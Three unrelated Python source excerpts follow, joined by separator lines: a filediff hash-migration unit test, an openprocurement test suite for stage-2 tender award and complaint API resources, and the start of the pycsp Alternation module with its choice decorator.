binary=Base64DecodedValue(self.DEFAULT_GIT_FILEDIFF_DATA_DIFF))
parent_legacy = LegacyFileDiffData.objects.create(
binary_hash='def456',
binary=Base64DecodedValue(self.parent_diff))
filediff1 = self.filediff
filediff1.legacy_diff_hash = legacy
filediff1.legacy_parent_diff_hash = parent_legacy
filediff1.save()
filediff2 = FileDiff.objects.get(pk=filediff1.pk)
# Make sure that we're in the expected state.
self.assertEqual(filediff1.legacy_diff_hash_id, legacy.pk)
self.assertEqual(filediff1.legacy_parent_diff_hash_id,
parent_legacy.pk)
self.assertEqual(filediff2.legacy_diff_hash_id, legacy.pk)
self.assertEqual(filediff2.legacy_parent_diff_hash_id,
parent_legacy.pk)
# This should prompt the migration of the first instance.
diff1 = self.filediff.diff
parent_diff1 = filediff1.parent_diff
# This should prompt the migration of the second instance.
diff2 = filediff2.diff
parent_diff2 = filediff2.parent_diff
# At this point, we should have valid diffs, and neither call
# above should have raised an exception due to a dangling hash ID.
self.assertEqual(diff1, self.DEFAULT_GIT_FILEDIFF_DATA_DIFF)
self.assertEqual(diff1, diff2)
self.assertEqual(parent_diff1, self.parent_diff)
self.assertEqual(parent_diff1, parent_diff2)
self.assertEqual(LegacyFileDiffData.objects.count(), 0)
self.assertEqual(RawFileDiffData.objects.count(), 2)
# Check the hash references.
self.assertIsNotNone(filediff1.diff_hash)
self.assertIsNotNone(filediff2.diff_hash)
self.assertEqual(filediff1.diff_hash, filediff2.diff_hash)
self.assertIsNotNone(filediff1.parent_diff_hash)
self.assertIsNotNone(filediff2.parent_diff_hash)
self.assertEqual(filediff1.parent_diff_hash,
filediff2.parent_diff_hash)
self.assertIsNone(filediff1.legacy_diff_hash)
self.assertIsNone(filediff2.legacy_diff_hash)
self.assertIsNone(filediff1.legacy_parent_diff_hash)
self.assertIsNone(filediff2.legacy_parent_diff_hash)
# Check the diff content.
self.assertEqual(filediff1.diff64, b'')
self.assertEqual(filediff2.diff64, b'')
self.assertEqual(filediff1.diff_hash.content,
self.DEFAULT_GIT_FILEDIFF_DATA_DIFF)
self.assertEqual(filediff2.diff_hash.content,
self.DEFAULT_GIT_FILEDIFF_DATA_DIFF)
# Check the parent_diff content.
self.assertEqual(filediff1.parent_diff64, b'')
self.assertEqual(filediff2.parent_diff64, b'')
self.assertEqual(filediff1.parent_diff_hash.content, self.parent_diff)
self.assertEqual(filediff2.parent_diff_hash.content, self.parent_diff)
|
|
# -*- coding: utf-8 -*-
import unittest
from copy import deepcopy
from openprocurement.api.tests.base import (
snitch
)
from openprocurement.tender.belowthreshold.tests.award import (
TenderAwardComplaintResourceTestMixin,
TenderAwardComplaintDocumentResourceTestMixin,
TenderAwardDocumentResourceTestMixin,
Tender2LotAwardDocumentResourceTestMixin,
)
from openprocurement.tender.belowthreshold.tests.award_blanks import (
# TenderLotAwardComplaintResourceTest
get_tender_lot_award_complaint,
get_tender_lot_award_complaints,
# Tender2LotAwardComplaintDocumentResourceTest
create_tender_lots_award_complaint_document,
)
from openprocurement.tender.openua.tests.award import (
TenderUaAwardComplaintResourceTestMixin,
TenderAwardResourceTestMixin
)
from openprocurement.tender.openua.tests.award_blanks import (
# TenderAwardResourceTest
create_tender_award,
patch_tender_award,
patch_tender_award_active,
patch_tender_award_unsuccessful,
# TenderAwardComplaintDocumentResourceTest
patch_tender_award_complaint_document as patch_tender_award_complaint_document_from_ua,
# TenderLotAwardResourceTest
create_tender_lot_award,
patch_tender_lot_award,
patch_tender_lot_award_unsuccessful,
# Tender2LotAwardComplaintResourceTest
create_tender_lots_award,
patch_tender_lots_award,
# TenderLotAwardComplaintResourceTest
create_tender_lot_award_complaint,
patch_tender_lot_award_complaint,
# Tender2LotAwardComplaintResourceTest
create_tender_lots_award_complaint,
patch_tender_lots_award_complaint,
# Tender2LotAwardComplaintDocumentResourceTest
put_tender_lots_award_complaint_document,
patch_tender_lots_award_complaint_document,
)
from openprocurement.tender.openeu.tests.award import (
TenderAwardResourceTestMixin,
TenderLotAwardResourceTestMixin,
Tender2LotAwardResourceTestMixin,
TenderLotAwardComplaintResourceTestMixin,
Tender2LotAwardComplaintResourceTestMixin,
)
from openprocurement.tender.competitivedialogue.tests.base import (
BaseCompetitiveDialogEUStage2ContentWebTest,
BaseCompetitiveDialogUAStage2ContentWebTest,
test_bids,
test_lots,
author
)
from openprocurement.tender.competitivedialogue.tests.stage2.award_blanks import (
    # TenderAwardComplaintDocument EU
create_tender_award_complaint_document,
put_tender_award_complaint_document,
patch_tender_award_complaint_document,
    # TenderAwardResourceTest UA
create_tender_award_invalid,
get_tender_award,
patch_tender_award_Administrator_change,
)
test_tender_bids = deepcopy(test_bids[:2])
for test_bid in test_tender_bids:
test_bid['tenderers'] = [author]
class TenderStage2EUAwardResourceTest(BaseCompetitiveDialogEUStage2ContentWebTest,
TenderAwardResourceTestMixin):
initial_status = 'active.tendering'
initial_bids = test_tender_bids
initial_lots = test_lots
initial_auth = ('Basic', ('broker', ''))
expected_award_amount = initial_bids[0]['value']['amount']
def setUp(self):
""" Create tender with lots add 2 bids, play auction and get award """
super(TenderStage2EUAwardResourceTest, self).setUp()
# switch to active.pre-qualification
self.set_status('active.pre-qualification', {'id': self.tender_id, 'status': 'active.tendering'})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.json['data']['status'], 'active.pre-qualification')
# qualify bids
response = self.app.get('/tenders/{}/qualifications'.format(self.tender_id))
self.app.authorization = ('Basic', ('broker', ''))
for qualification in response.json['data']:
response = self.app.patch_json('/tenders/{}/qualifications/{}?acc_token={}'.format(
self.tender_id, qualification['id'], self.tender_token),
{'data': {'status': 'active', 'qualified': True, 'eligible': True}})
self.assertEqual(response.status, '200 OK')
# switch to active.pre-qualification.stand-still
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(self.tender_id, self.tender_token),
{'data': {'status': 'active.pre-qualification.stand-still'}})
self.assertEqual(response.json['data']['status'], 'active.pre-qualification.stand-still')
# switch to active.auction time
self.set_status('active.auction', {'id': self.tender_id, 'status': 'active.pre-qualification.stand-still'})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.json['data']['status'], 'active.auction')
# switch to auction role
self.app.authorization = ('Basic', ('auction', ''))
response = self.app.get('/tenders/{}/auction'.format(self.tender_id))
auction_bids_data = response.json['data']['bids']
for lot_id in self.lots:
response = self.app.post_json('/tenders/{}/auction/{}'.format(self.tender_id, lot_id['id']),
{'data': {'bids': auction_bids_data}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
response = self.app.get('/tenders/{}'.format(self.tender_id))
self.assertEqual(response.json['data']['status'], 'active.qualification')
# get award
response = self.app.get('/tenders/{}/awards'.format(self.tender_id))
self.award_id = response.json['data'][0]['id']
self.bid_token = self.initial_bids_tokens[self.bids[0]['id']]
self.app.authorization = ('Basic', ('broker', ''))
class TenderStage2EULotAwardResourceTest(BaseCompetitiveDialogEUStage2ContentWebTest,
TenderLotAwardResourceTestMixin):
initial_status = 'active.tendering'
initial_bids = test_tender_bids
initial_lots = test_lots
initial_auth = ('Basic', ('broker', ''))
expected_award_amount = test_bids[0]['value']['amount']
def setUp(self):
super(TenderStage2EULotAwardResourceTest, self).setUp()
# switch to active.pre-qualification
self.set_status('active.pre-qualification', {'id': self.tender_id, 'status': 'active.tendering'})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(
self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.json['data']['status'], 'active.pre-qualification')
# qualify bids
response = self.app.get('/tenders/{}/qualifications'.format(self.tender_id))
self.app.authorization = ('Basic', ('broker', ''))
for qualification in response.json['data']:
response = self.app.patch_json('/tenders/{}/qualifications/{}?acc_token={}'.format(
self.tender_id, qualification['id'], self.tender_token),
{'data': {'status': 'active', 'qualified': True, 'eligible': True}})
self.assertEqual(response.status, '200 OK')
# switch to active.pre-qualification.stand-still
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(
self.tender_id, self.tender_token),
{'data': {'status': 'active.pre-qualification.stand-still'}})
self.assertEqual(response.json['data']['status'], 'active.pre-qualification.stand-still')
# switch to active.auction
self.set_status('active.auction', {'id': self.tender_id, 'status': 'active.pre-qualification.stand-still'})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.json['data']['status'], 'active.auction')
self.app.authorization = ('Basic', ('auction', ''))
response = self.app.get('/tenders/{}/auction'.format(self.tender_id))
auction_bids_data = response.json['data']['bids']
for lot_id in self.lots:
response = self.app.post_json('/tenders/{}/auction/{}'.format(self.tender_id, lot_id['id']),
{'data': {'bids': auction_bids_data}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
response = self.app.get('/tenders/{}'.format(self.tender_id))
self.assertEqual(response.json['data']['status'], 'active.qualification')
# Get award
response = self.app.get('/tenders/{}/awards'.format(self.tender_id))
self.award_id = response.json['data'][0]['id']
self.bid_token = self.initial_bids_tokens[self.bids[0]['id']]
self.app.authorization = ('Basic', ('broker', ''))
class TenderStage2EU2LotAwardResourceTest(BaseCompetitiveDialogEUStage2ContentWebTest,
Tender2LotAwardResourceTestMixin):
initial_status = 'active.tendering'
initial_lots = deepcopy(2 * test_lots)
initial_bids = test_tender_bids
initial_auth = ('Basic', ('broker', ''))
def setUp(self):
super(TenderStage2EU2LotAwardResourceTest, self).setUp()
# switch to active.pre-qualification
self.set_status('active.pre-qualification', {'id': self.tender_id, 'status': 'active.tendering'})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.json['data']['status'], 'active.pre-qualification')
# qualify bids
response = self.app.get('/tenders/{}/qualifications'.format(self.tender_id))
self.app.authorization = ('Basic', ('broker', ''))
for qualification in response.json['data']:
response = self.app.patch_json('/tenders/{}/qualifications/{}?acc_token={}'.format(
self.tender_id, qualification['id'], self.tender_token),
{'data': {'status': 'active', 'qualified': True, 'eligible': True}})
self.assertEqual(response.status, '200 OK')
# switch to active.pre-qualification.stand-still
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(
self.tender_id, self.tender_token), {'data': {'status': 'active.pre-qualification.stand-still'}})
self.assertEqual(response.json['data']['status'], 'active.pre-qualification.stand-still')
# switch to active.auction
self.set_status('active.auction', {'id': self.tender_id, 'status': 'active.pre-qualification.stand-still'})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.json['data']['status'], 'active.auction')
self.app.authorization = ('Basic', ('auction', ''))
response = self.app.get('/tenders/{}/auction'.format(self.tender_id))
auction_bids_data = response.json['data']['bids']
for lot_id in self.lots:
response = self.app.post_json('/tenders/{}/auction/{}'.format(self.tender_id, lot_id['id']),
{'data': {'bids': auction_bids_data}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
response = self.app.get('/tenders/{}'.format(self.tender_id))
self.assertEqual(response.json['data']['status'], 'active.qualification')
# Get award
response = self.app.get('/tenders/{}/awards'.format(self.tender_id))
self.award_id = response.json['data'][0]['id']
self.app.authorization = ('Basic', ('broker', ''))
class TenderStage2EUAwardComplaintResourceTest(BaseCompetitiveDialogEUStage2ContentWebTest,
TenderAwardComplaintResourceTestMixin,
TenderUaAwardComplaintResourceTestMixin):
initial_status = 'active.tendering'
initial_bids = test_tender_bids
initial_lots = deepcopy(2 * test_lots)
initial_auth = ('Basic', ('broker', ''))
def setUp(self):
super(TenderStage2EUAwardComplaintResourceTest, self).setUp()
# switch to active.pre-qualification
self.set_status('active.pre-qualification', {'id': self.tender_id, 'status': 'active.tendering'})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.json['data']['status'], 'active.pre-qualification')
# qualify bids
response = self.app.get('/tenders/{}/qualifications'.format(self.tender_id))
self.app.authorization = ('Basic', ('broker', ''))
for qualification in response.json['data']:
response = self.app.patch_json('/tenders/{}/qualifications/{}?acc_token={}'.format(
self.tender_id, qualification['id'], self.tender_token),
{'data': {'status': 'active', 'qualified': True, 'eligible': True}})
self.assertEqual(response.status, '200 OK')
# switch to active.pre-qualification.stand-still
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(self.tender_id, self.tender_token),
{'data': {'status': 'active.pre-qualification.stand-still'}})
self.assertEqual(response.json['data']['status'], 'active.pre-qualification.stand-still')
# switch to active.auction
self.set_status('active.auction', {'id': self.tender_id, 'status': 'active.pre-qualification.stand-still'})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.json['data']['status'], 'active.auction')
self.app.authorization = ('Basic', ('auction', ''))
response = self.app.get('/tenders/{}/auction'.format(self.tender_id))
auction_bids_data = response.json['data']['bids']
for lot_id in self.lots:
response = self.app.post_json('/tenders/{}/auction/{}'.format(self.tender_id, lot_id['id']),
{'data': {'bids': auction_bids_data}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
response = self.app.get('/tenders/{}'.format(self.tender_id))
self.assertEqual(response.json['data']['status'], 'active.qualification')
# Get award
response = self.app.get('/tenders/{}/awards'.format(self.tender_id))
self.award_id = response.json['data'][0]['id']
self.app.authorization = ('Basic', ('broker', ''))
self.app.patch_json('/tenders/{}/awards/{}?acc_token={}'.format(self.tender_id, self.award_id, self.tender_token), {'data': {'status': 'active', "qualified": True, "eligible": True}})
self.bid_token = self.initial_bids_tokens[self.bids[0]['id']]
self.app.authorization = ('Basic', ('broker', ''))
class TenderStage2EULotAwardComplaintResourceTest(BaseCompetitiveDialogEUStage2ContentWebTest,
TenderLotAwardComplaintResourceTestMixin):
initial_status = 'active.tendering'
initial_lots = deepcopy(test_lots)
initial_bids = test_tender_bids
initial_auth = ('Basic', ('broker', ''))
def setUp(self):
super(TenderStage2EULotAwardComplaintResourceTest, self).setUp()
# switch to active.pre-qualification
self.set_status('active.pre-qualification', {'id': self.tender_id, 'status': 'active.tendering'})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.json['data']['status'], 'active.pre-qualification')
# qualify bids
response = self.app.get('/tenders/{}/qualifications'.format(self.tender_id))
self.app.authorization = ('Basic', ('broker', ''))
for qualification in response.json['data']:
response = self.app.patch_json('/tenders/{}/qualifications/{}?acc_token={}'.format(
self.tender_id, qualification['id'], self.tender_token),
{'data': {'status': 'active', 'qualified': True, 'eligible': True}})
self.assertEqual(response.status, '200 OK')
# switch to active.pre-qualification.stand-still
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(self.tender_id, self.tender_token),
{'data': {'status': 'active.pre-qualification.stand-still'}})
self.assertEqual(response.json['data']['status'], 'active.pre-qualification.stand-still')
# switch to active.auction
self.set_status('active.auction', {'id': self.tender_id, 'status': 'active.pre-qualification.stand-still'})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.json['data']['status'], 'active.auction')
self.app.authorization = ('Basic', ('auction', ''))
response = self.app.get('/tenders/{}/auction'.format(self.tender_id))
auction_bids_data = response.json['data']['bids']
for lot_id in self.lots:
response = self.app.post_json('/tenders/{}/auction/{}'.format(self.tender_id, lot_id['id']),
{'data': {'bids': auction_bids_data}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
response = self.app.get('/tenders/{}'.format(self.tender_id))
self.assertEqual(response.json['data']['status'], 'active.qualification')
# Create award
self.app.authorization = ('Basic', ('token', ''))
bid = self.bids[0]
response = self.app.post_json('/tenders/{}/awards'.format(self.tender_id),
{'data': {'suppliers': [author],
'status': 'pending',
'bid_id': bid['id'],
'lotID': bid['lotValues'][0]['relatedLot']}})
award = response.json['data']
self.award_id = award['id']
self.app.patch_json('/tenders/{}/awards/{}'.format(self.tender_id, self.award_id), {'data': {'status': 'active', "qualified": True, "eligible": True}})
self.bid_token = self.initial_bids_tokens[self.bids[0]['id']]
self.app.authorization = ('Basic', ('broker', ''))
class TenderStage2EU2LotAwardComplaintResourceTest(TenderStage2EULotAwardComplaintResourceTest,
Tender2LotAwardComplaintResourceTestMixin):
initial_lots = deepcopy(2 * test_lots)
class TenderStage2EUAwardComplaintDocumentResourceTest(BaseCompetitiveDialogEUStage2ContentWebTest,
TenderAwardComplaintDocumentResourceTestMixin):
initial_status = 'active.qualification'
initial_bids = test_tender_bids
def setUp(self):
super(TenderStage2EUAwardComplaintDocumentResourceTest, self).setUp()
# Create award
self.app.authorization = ('Basic', ('token', ''))
response = self.app.post_json('/tenders/{}/awards'.format(self.tender_id),
{'data': {'suppliers': [author],
'status': 'pending',
'bid_id': self.bids[0]['id']}})
award = response.json['data']
self.award_id = award['id']
self.app.patch_json('/tenders/{}/awards/{}'.format(self.tender_id, self.award_id), {'data': {'status': 'active', "qualified": True, "eligible": True}})
# Create complaint for award
response = self.app.post_json('/tenders/{}/awards/{}/complaints'.format(self.tender_id, self.award_id),
{'data': {'title': 'complaint title',
'description': 'complaint description',
'author': author}})
complaint = response.json['data']
self.complaint_id = complaint['id']
self.complaint_owner_token = response.json['access']['token']
test_patch_tender_award_complaint_document = snitch(patch_tender_award_complaint_document_from_ua)
class TenderStage2EU2LotAwardComplaintDocumentResourceTest(BaseCompetitiveDialogEUStage2ContentWebTest):
initial_status = 'active.qualification'
initial_bids = test_tender_bids
initial_lots = deepcopy(2 * test_lots)
def setUp(self):
super(TenderStage2EU2LotAwardComplaintDocumentResourceTest, self).setUp()
# Create award
bid = self.bids[0]
self.app.authorization = ('Basic', ('token', ''))
self.app.post_json('/tenders/{}/awards'.format(self.tender_id),
{'data': {'suppliers': [author], 'status': 'pending', 'bid_id': bid['id'], 'lotID': bid['lotValues'][1]['relatedLot']}})
response = self.app.post_json('/tenders/{}/awards'.format(self.tender_id),
{'data': {'suppliers': [author], 'status': 'pending',
'bid_id': bid['id'], 'lotID': bid['lotValues'][0]['relatedLot']}})
award = response.json['data']
self.award_id = award['id']
self.app.patch_json('/tenders/{}/awards/{}'.format(self.tender_id, self.award_id), {'data': {'status': 'active', "qualified": True, "eligible": True}})
# Create complaint for award
response = self.app.post_json('/tenders/{}/awards/{}/complaints'.format(self.tender_id, self.award_id),
{'data': {'title': 'complaint title',
'description': 'complaint description',
'author': author}})
complaint = response.json['data']
self.complaint_id = complaint['id']
self.complaint_owner_token = response.json['access']['token']
test_create_tender_award_complaint_document = snitch(create_tender_award_complaint_document)
test_put_tender_award_complaint_document = snitch(put_tender_award_complaint_document)
test_patch_tender_award_complaint_document = snitch(patch_tender_award_complaint_document)
class TenderStage2EUAwardDocumentResourceTest(BaseCompetitiveDialogEUStage2ContentWebTest,
TenderAwardDocumentResourceTestMixin):
initial_status = 'active.qualification'
initial_bids = test_tender_bids
def setUp(self):
super(TenderStage2EUAwardDocumentResourceTest, self).setUp()
# Create award
self.app.authorization = ('Basic', ('token', ''))
response = self.app.post_json('/tenders/{}/awards'.format(self.tender_id),
{'data': {'suppliers': [author],
'status': 'pending',
'bid_id': self.bids[0]['id']}})
award = response.json['data']
self.award_id = award['id']
class TenderStage2EU2LotAwardDocumentResourceTest(BaseCompetitiveDialogEUStage2ContentWebTest,
Tender2LotAwardDocumentResourceTestMixin):
initial_status = 'active.qualification'
initial_bids = test_tender_bids
initial_lots = deepcopy(2 * test_lots)
def setUp(self):
super(TenderStage2EU2LotAwardDocumentResourceTest, self).setUp()
# Create award
bid = self.bids[0]
self.app.authorization = ('Basic', ('token', ''))
response = self.app.post_json('/tenders/{}/awards'.format(self.tender_id),
{'data': {'suppliers': [author], 'status': 'pending',
'bid_id': bid['id'], 'lotID': bid['lotValues'][0]['relatedLot']}})
award = response.json['data']
self.award_id = award['id']
# UA
class TenderStage2UAAwardResourceTest(BaseCompetitiveDialogUAStage2ContentWebTest):
initial_status = 'active.qualification'
initial_bids = test_tender_bids
test_create_tender_award = snitch(create_tender_award)
test_patch_tender_award = snitch(patch_tender_award)
test_patch_tender_award_active = snitch(patch_tender_award_active)
test_patch_tender_award_unsuccessful = snitch(patch_tender_award_unsuccessful)
test_create_tender_award_invalid = snitch(create_tender_award_invalid)
test_get_tender_award = snitch(get_tender_award)
test_patch_tender_award_Administrator_change = snitch(patch_tender_award_Administrator_change)
class TenderStage2UALotAwardResourceTest(BaseCompetitiveDialogUAStage2ContentWebTest):
initial_status = 'active.qualification'
initial_lots = deepcopy(test_lots)
initial_bids = test_tender_bids
test_create_lot_award = snitch(create_tender_lot_award)
test_patch_tender_lot_award = snitch(patch_tender_lot_award)
test_patch_tender_lot_award_unsuccessful = snitch(patch_tender_lot_award_unsuccessful)
class TenderStage2UA2LotAwardResourceTest(BaseCompetitiveDialogUAStage2ContentWebTest):
initial_status = 'active.qualification'
initial_lots = deepcopy(2 * test_lots)
initial_bids = test_tender_bids
test_create_tender_lots_award = snitch(create_tender_lots_award)
test_patch_tender_lots_award = snitch(patch_tender_lots_award)
class TenderStage2UAAwardComplaintResourceTest(BaseCompetitiveDialogUAStage2ContentWebTest,
TenderAwardComplaintResourceTestMixin,
TenderUaAwardComplaintResourceTestMixin):
initial_status = 'active.qualification'
initial_bids = test_tender_bids
def setUp(self):
super(TenderStage2UAAwardComplaintResourceTest, self).setUp()
# Create award
auth = self.app.authorization
self.app.authorization = ('Basic', ('token', ''))
response = self.app.post_json('/tenders/{}/awards'.format(self.tender_id),
{'data': {'suppliers': [author],
'status': 'pending',
'bid_id': self.bids[0]['id']}})
award = response.json['data']
self.award_id = award['id']
self.app.patch_json('/tenders/{}/awards/{}'.format(self.tender_id, self.award_id), {'data': {'status': 'active', "qualified": True, "eligible": True}})
self.app.authorization = auth
self.bid_token = self.initial_bids_tokens[self.bids[0]['id']]
class TenderStage2UALotAwardComplaintResourceTest(BaseCompetitiveDialogUAStage2ContentWebTest):
initial_status = 'active.qualification'
initial_lots = deepcopy(test_lots)
initial_bids = test_tender_bids
def setUp(self):
super(TenderStage2UALotAwardComplaintResourceTest, self).setUp()
# Create award
bid = self.bids[0]
auth = self.app.authorization
self.app.authorization = ('Basic', ('token', ''))
response = self.app.post_json('/tenders/{}/awards'.format(self.tender_id),
{'data': {'suppliers': [author], 'status': 'pending',
'bid_id': bid['id'], 'lotID': bid['lotValues'][0]['relatedLot']}})
award = response.json['data']
self.award_id = award['id']
self.app.patch_json('/tenders/{}/awards/{}'.format(self.tender_id, self.award_id), {'data': {'status': 'active', "qualified": True, "eligible": True}})
self.bid_token = self.initial_bids_tokens[self.bids[0]['id']]
self.app.authorization = auth
test_create_tender_lot_award_complaint = snitch(create_tender_lot_award_complaint)
test_patch_tender_lot_award_complaint = snitch(patch_tender_lot_award_complaint)
test_get_tender_lot_award_complaint = snitch(get_tender_lot_award_complaint)
test_get_tender_lot_award_complaints = snitch(get_tender_lot_award_complaints)
class Tender2LotAwardComplaintResourceTest(TenderStage2UALotAwardComplaintResourceTest):
initial_lots = deepcopy(2 * test_lots)
test_create_tender_lots_award_complaint = snitch(create_tender_lots_award_complaint)
test_patch_tender_lots_award_complaint = snitch(patch_tender_lots_award_complaint)
class TenderStage2UAAwardComplaintDocumentResourceTest(BaseCompetitiveDialogUAStage2ContentWebTest,
TenderAwardComplaintDocumentResourceTestMixin):
initial_status = 'active.qualification'
initial_bids = test_tender_bids
def setUp(self):
super(TenderStage2UAAwardComplaintDocumentResourceTest, self).setUp()
# Create award
auth = self.app.authorization
self.app.authorization = ('Basic', ('token', ''))
response = self.app.post_json('/tenders/{}/awards'.format(self.tender_id),
{'data': {'suppliers': [author],
'status': 'pending',
'bid_id': self.bids[0]['id']}})
award = response.json['data']
self.award_id = award['id']
self.app.patch_json('/tenders/{}/awards/{}'.format(self.tender_id, self.award_id), {'data': {'status': 'active', "qualified": True, "eligible": True}})
self.app.authorization = auth
# Create complaint for award
bid_token = self.initial_bids_tokens[self.bids[0]['id']]
response = self.app.post_json('/tenders/{}/awards/{}/complaints?acc_token={}'.format(
self.tender_id, self.award_id, bid_token),
{'data': {'title': 'complaint title',
'description': 'complaint description',
'author': author}})
complaint = response.json['data']
self.complaint_id = complaint['id']
self.complaint_owner_token = response.json['access']['token']
test_patch_tender_award_complaint_document = snitch(patch_tender_award_complaint_document)
class TenderStage2UA2LotAwardComplaintDocumentResourceTest(BaseCompetitiveDialogUAStage2ContentWebTest):
initial_status = 'active.qualification'
initial_bids = test_tender_bids
initial_lots = deepcopy(2 * test_lots)
def setUp(self):
super(TenderStage2UA2LotAwardComplaintDocumentResourceTest, self).setUp()
# Create award
bid = self.bids[0]
bid_token = self.initial_bids_tokens[self.bids[0]['id']]
auth = self.app.authorization
self.app.authorization = ('Basic', ('token', ''))
response = self.app.post_json('/tenders/{}/awards'.format(self.tender_id),
{'data': {'suppliers': [author], 'status': 'pending',
'bid_id': bid['id'], 'lotID': bid['lotValues'][0]['relatedLot']}})
award = response.json['data']
self.award_id = award['id']
self.app.patch_json('/tenders/{}/awards/{}'.format(self.tender_id, self.award_id), {'data': {'status': 'active', "qualified": True, "eligible": True}})
self.app.authorization = auth
# Create complaint for award
response = self.app.post_json('/tenders/{}/awards/{}/complaints?acc_token={}'.format(
self.tender_id, self.award_id, bid_token),
{'data': {'title': 'complaint title', 'description': 'complaint description', 'author': author}})
complaint = response.json['data']
self.complaint_id = complaint['id']
self.complaint_owner_token = response.json['access']['token']
test_create_tender_lots_award_document = snitch(create_tender_lots_award_complaint_document)
test_put_tender_lots_award_complaint_document = snitch(put_tender_lots_award_complaint_document)
test_patch_tender_lots_award_complaint_document = snitch(patch_tender_lots_award_complaint_document)
class TenderStage2UAAwardDocumentResourceTest(BaseCompetitiveDialogUAStage2ContentWebTest,
TenderAwardDocumentResourceTestMixin):
initial_status = 'active.qualification'
initial_bids = test_tender_bids
def setUp(self):
super(TenderStage2UAAwardDocumentResourceTest, self).setUp()
# Create award
auth = self.app.authorization
self.app.authorization = ('Basic', ('token', ''))
response = self.app.post_json('/tenders/{}/awards'.format(self.tender_id),
{'data': {'suppliers': [author],
'status': 'pending',
'bid_id': self.bids[0]['id']}})
award = response.json['data']
self.award_id = award['id']
self.app.authorization = auth
class TenderStage2UA2LotAwardDocumentResourceTest(BaseCompetitiveDialogUAStage2ContentWebTest,
Tender2LotAwardDocumentResourceTestMixin):
initial_status = 'active.qualification'
initial_bids = test_tender_bids
initial_lots = deepcopy(2 * test_lots)
def setUp(self):
super(TenderStage2UA2LotAwardDocumentResourceTest, self).setUp()
# Create award
bid = self.bids[0]
auth = self.app.authorization
self.app.authorization = ('Basic', ('token', ''))
response = self.app.post_json('/tenders/{}/awards'.format(
self.tender_id), {'data': {'suppliers': [author], 'status': 'pending',
'bid_id': bid['id'], 'lotID': bid['lotValues'][0]['relatedLot']}})
award = response.json['data']
self.award_id = award['id']
self.app.authorization = auth
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TenderStage2EU2LotAwardComplaintDocumentResourceTest))
suite.addTest(unittest.makeSuite(TenderStage2EU2LotAwardComplaintResourceTest))
suite.addTest(unittest.makeSuite(TenderStage2EU2LotAwardDocumentResourceTest))
suite.addTest(unittest.makeSuite(TenderStage2EU2LotAwardResourceTest))
suite.addTest(unittest.makeSuite(TenderStage2EUAwardComplaintDocumentResourceTest))
suite.addTest(unittest.makeSuite(TenderStage2EUAwardComplaintResourceTest))
suite.addTest(unittest.makeSuite(TenderStage2EUAwardDocumentResourceTest))
suite.addTest(unittest.makeSuite(TenderStage2EUAwardResourceTest))
suite.addTest(unittest.makeSuite(TenderStage2EULotAwardResourceTest))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='suite')
|
|
"""
Alternation module
Copyright (c) 2009 John Markus Bjoerndalen <[email protected]>,
Brian Vinter <[email protected]>, Rune M. Friborg <[email protected]>.
See LICENSE.txt for licensing details (MIT License).
"""
# Imports
import inspect
import types
import collections
import pickle
from pycsp.parallel.guard import Guard
from pycsp.parallel.exceptions import *
from pycsp.parallel.const import *
# Decorators
def choice(func):
"""
@choice decorator for making a function into a Choice factory.
    Each generated Choice object can be used as an action in one of
    the four guards: InputGuard, OutputGuard, SkipGuard or TimeoutGuard.
    The keyword argument channel_input is special and is provided when the
    choice is executed. Choice functions must accept the channel_input
    parameter when used in InputGuards.
Usage:
>>> @choice
... def add_service(serviceDB, channel_input):
... (id, request) = channel_input
... if serviceDB.has_key(id):
... serviceDB[id].append(request)
... else:
... serviceDB[id] = [request]
>>> @choice
... def quit(ch_end):
... poison(ch_end)
>>> _,_ = AltSelect(
InputGuard(request, action=add_service(services)),
TimeoutGuard(action=quit(request)))
The Choice factory returned by the @choice decorator:
func(*args, **kwargs)
"""
# __choice_fn func_name used to identify function in Alternation.execute
def __choice_fn(*args, **kwargs):
return Choice(func, *args, **kwargs)
return __choice_fn
# Classes
class Choice(object):
""" Choice(func, *args, **kwargs)
    It is recommended to use the @choice decorator to create Choice instances.
"""
def __init__(self, fn, *args, **kwargs):
self.fn = fn
self.args = args
self.kwargs = kwargs
def invoke_on_input(self, channel_input):
self.kwargs['channel_input'] = channel_input
self.fn(*self.args, **self.kwargs)
del self.kwargs['channel_input']
def invoke_on_output(self):
self.fn(*self.args, **self.kwargs)
